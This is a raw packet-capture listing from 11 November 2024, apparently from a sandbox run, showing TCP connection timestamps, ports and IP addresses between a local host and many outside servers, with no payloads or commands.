                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734905005 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.734916925 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735064030 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735075951 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735086918 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735121012 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735131979 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735538006 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735549927 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735560894 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735572100 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735584021 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735595942 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.735626936 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.736442089 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.736454964 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.736465931 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.736496925 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.736521006 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.736529112 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.736532927 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.736557007 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.736582041 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.737298012 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.737338066 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.737349987 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.737355947 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.737394094 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.739356995 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.739397049 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.739413977 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.739435911 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.743973970 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744044065 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744071007 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744116068 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744534016 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744596004 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744601965 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744642973 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744652987 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744659901 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744698048 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744704962 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744793892 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744798899 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744834900 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744883060 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744889975 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.744945049 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.745239019 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.745279074 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.745316982 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.745328903 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.775933981 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.775949001 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.775964022 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.776005983 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.776050091 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.778871059 CET8049722154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.778933048 CET4972280192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.815543890 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.815568924 CET8049709199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.815609932 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.815640926 CET4970980192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.817636013 CET4972280192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.823786974 CET8049722154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.826864958 CET4971280192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:10.831840992 CET8049712188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.171658993 CET8049712188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.171725035 CET4971280192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.176244020 CET8049712188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.176325083 CET4971280192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.176943064 CET8049722154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.177017927 CET4972280192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.198996067 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.199049950 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.199121952 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.199385881 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.199393034 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.634946108 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.635021925 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.636831045 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.636842012 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.637099981 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.637146950 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.637592077 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:11.679342031 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.368941069 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369007111 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369024038 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369092941 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369132996 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369141102 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369211912 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369218111 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369283915 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369332075 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369339943 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369381905 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369389057 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369419098 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369434118 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369626999 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369632959 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.369678020 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.428024054 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.428134918 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.428181887 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.451042891 CET4972480192.168.2.813.248.169.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.455832958 CET804972413.248.169.48192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.455887079 CET4972480192.168.2.813.248.169.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.456636906 CET4972480192.168.2.813.248.169.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.461400032 CET804972413.248.169.48192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.718424082 CET4972580192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.723485947 CET8049725188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.723558903 CET4972580192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.723759890 CET4972580192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.729531050 CET8049725188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.745601892 CET4972680192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.751142025 CET80497263.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.751204014 CET4972680192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.751336098 CET4972680192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.756186008 CET80497263.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.864002943 CET4972780192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.869014025 CET804972718.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.869141102 CET4972780192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.869266033 CET4972780192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.874233007 CET804972718.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.902740955 CET804972413.248.169.48192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.903966904 CET4972480192.168.2.813.248.169.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.067819118 CET4972880192.168.2.8103.150.10.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.072835922 CET8049728103.150.10.48192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.072923899 CET4972880192.168.2.8103.150.10.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.073059082 CET4972880192.168.2.8103.150.10.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.077929974 CET8049728103.150.10.48192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.177643061 CET80497263.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.177711964 CET4972680192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.180619001 CET4972680192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.184547901 CET80497263.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.184592962 CET4972680192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.185509920 CET80497263.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.302082062 CET804972718.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.302135944 CET4972780192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.304792881 CET4972780192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.308851004 CET804972718.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.308906078 CET4972780192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.309704065 CET804972718.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.583972931 CET8049725188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.584547997 CET4972580192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.586527109 CET8049725188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.586802959 CET4972580192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.598817110 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.598864079 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.599097967 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.599241018 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.599251986 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.859889030 CET8049728103.150.10.48192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.860184908 CET4972880192.168.2.8103.150.10.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.870786905 CET497308000192.168.2.8106.15.232.163
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.876260996 CET800049730106.15.232.163192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.876487970 CET497308000192.168.2.8106.15.232.163
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.876764059 CET497308000192.168.2.8106.15.232.163
                                                                                                                                                                                                              Nov 11, 2024 18:33:13.881720066 CET800049730106.15.232.163192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.340195894 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.340312958 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.349330902 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.349351883 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.349694967 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.349858046 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.350471973 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.391328096 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.693023920 CET800049730106.15.232.163192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.693130970 CET497308000192.168.2.8106.15.232.163
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.694252968 CET4972880192.168.2.8103.150.10.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.699173927 CET8049728103.150.10.48192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.812707901 CET804971791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.812767982 CET4971780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.964091063 CET8049728103.150.10.48192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.967973948 CET4972880192.168.2.8103.150.10.48
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.979581118 CET497308000192.168.2.8106.15.232.163
                                                                                                                                                                                                              Nov 11, 2024 18:33:14.984656096 CET800049730106.15.232.163192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.260277987 CET800049730106.15.232.163192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.260368109 CET497308000192.168.2.8106.15.232.163
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.763979912 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764030933 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764041901 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764060974 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764070988 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764071941 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764113903 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764121056 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764128923 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764158964 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764172077 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764215946 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764221907 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764228106 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764250994 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764266014 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764523983 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.764569998 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.765256882 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.765284061 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.765285969 CET44349729188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.765328884 CET49729443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.766532898 CET4972580192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:15.771681070 CET8049725188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:16.123976946 CET8049725188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:16.124114037 CET4972580192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:16.129635096 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:16.129674911 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:16.129754066 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:16.130108118 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:16.130119085 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:17.632304907 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:17.632435083 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:17.634345055 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:17.634362936 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:17.634607077 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:17.634664059 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:17.634974957 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:17.679322958 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:18.802180052 CET8049711199.59.243.227192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:18.802342892 CET4971180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.045559883 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.045608044 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.045630932 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.045655966 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.045666933 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.045687914 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.046010017 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.046045065 CET44349731188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.046092033 CET49731443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.186065912 CET4973280192.168.2.876.223.67.189
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.190979958 CET804973276.223.67.189192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.191039085 CET4973280192.168.2.876.223.67.189
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.191246986 CET4973280192.168.2.876.223.67.189
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.196074009 CET804973276.223.67.189192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.245657921 CET4973380192.168.2.864.225.91.73
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.250971079 CET804973364.225.91.73192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.251044035 CET4973380192.168.2.864.225.91.73
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.251180887 CET4973380192.168.2.864.225.91.73
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.256725073 CET804973364.225.91.73192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.487704992 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.487950087 CET4973580192.168.2.8103.224.212.210
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.492892027 CET8049734103.224.182.252192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.493017912 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.493175983 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.493925095 CET8049735103.224.212.210192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.494108915 CET4973580192.168.2.8103.224.212.210
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.494313955 CET4973580192.168.2.8103.224.212.210
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.498145103 CET8049734103.224.182.252192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.499293089 CET8049735103.224.212.210192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.575781107 CET4973680192.168.2.8154.85.183.50
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.580905914 CET8049736154.85.183.50192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.581053019 CET4973680192.168.2.8154.85.183.50
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.581151009 CET4973680192.168.2.8154.85.183.50
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.586539984 CET8049736154.85.183.50192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.619551897 CET804973276.223.67.189192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.622159004 CET4973280192.168.2.876.223.67.189
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.802555084 CET804973364.225.91.73192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.802617073 CET4973380192.168.2.864.225.91.73
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.850707054 CET4973780192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.855660915 CET804973744.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.855762959 CET4973780192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.859117985 CET4973780192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.863941908 CET804973744.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.052227974 CET8049734103.224.182.252192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.052303076 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.062897921 CET8049735103.224.212.210192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.062966108 CET4973580192.168.2.8103.224.212.210
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.063710928 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.065141916 CET4973580192.168.2.8103.224.212.210
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.069245100 CET8049734103.224.182.252192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.069298983 CET4973480192.168.2.8103.224.182.252
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.070739985 CET8049735103.224.212.210192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.070785046 CET4973580192.168.2.8103.224.212.210
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.307344913 CET804973744.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.307399035 CET4973780192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.310128927 CET4973780192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.314026117 CET804973744.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.314085960 CET4973780192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.315210104 CET804973744.221.84.105192.168.2.8
